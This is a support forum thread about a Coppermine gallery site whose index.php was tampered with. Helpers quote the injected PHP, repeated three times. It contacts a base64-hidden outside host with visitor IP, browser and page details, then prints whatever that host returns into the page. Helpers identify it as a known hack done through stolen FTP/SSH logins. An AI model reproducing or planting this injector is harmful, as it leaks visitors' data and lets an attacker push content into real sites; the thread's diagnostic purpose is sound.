forum.coppermine-gallery.net

Support => cpg1.5.x Support => cpg1.5 miscellaneous => Topic started by: tortech on November 29, 2012, 01:43:02 pm

Title: error 452 in file index.php
Post by: tortech on November 29, 2012, 01:43:02 pm
Someone changed me file index.php. J have got error 452 and message:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /DD51932/index.php on line 452
J must copied oryginal file index.php and now program works good.
Bad file index.php now is on site www.mojagazetka.pl/index.php
J think is a good way to change atrib 755 to 644 for file named index.php
Title: Re: error 452 in file index.php
Post by: Αndré on November 29, 2012, 02:14:08 pm
Have a look at that line:
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.


change atrib 755 to 644 for file named index.php
I doubt that this will change anything.
Title: Re: Re: error 452 in file index.php
Post by: tortech on November 29, 2012, 03:12:05 pm
Thank you for answer and solve a problem.


Have a look at that line:
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.
Title: Re: Re: error 452 in file index.php
Post by: tortech on December 02, 2012, 12:56:24 pm
What kind of Atrb can J choose to main folder where is the Coprmine program, because somebody fist change atrib for file index.php from 644 to 755 and next damaged this file?


Have a look at that line:
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.
Title: Re: error 452 in file index.php
Post by: Αndré on December 03, 2012, 10:51:14 am
I doubt that setting any permission will fix your issue, as I assume that either somebody with root access changed your file (i.e. your hosting provider via a script) or used your login data (in this case he could set the permission to what he wants).
Title: Re: error 452 in file index.php
Post by: Veronica on December 03, 2012, 11:08:15 am
This is a Wordpress hack described in detail here
http://www.jexanalytics.com/2012/02/wordpress-sites-all-hacked/
Title: Re: error 452 in file index.php
Post by: Αndré on December 03, 2012, 11:30:19 am
As explained in Veronica's link, the attackers probably used your FTP/SSH account to change your files. So changing file permissions won't affect anything, but you have to change your server passwords.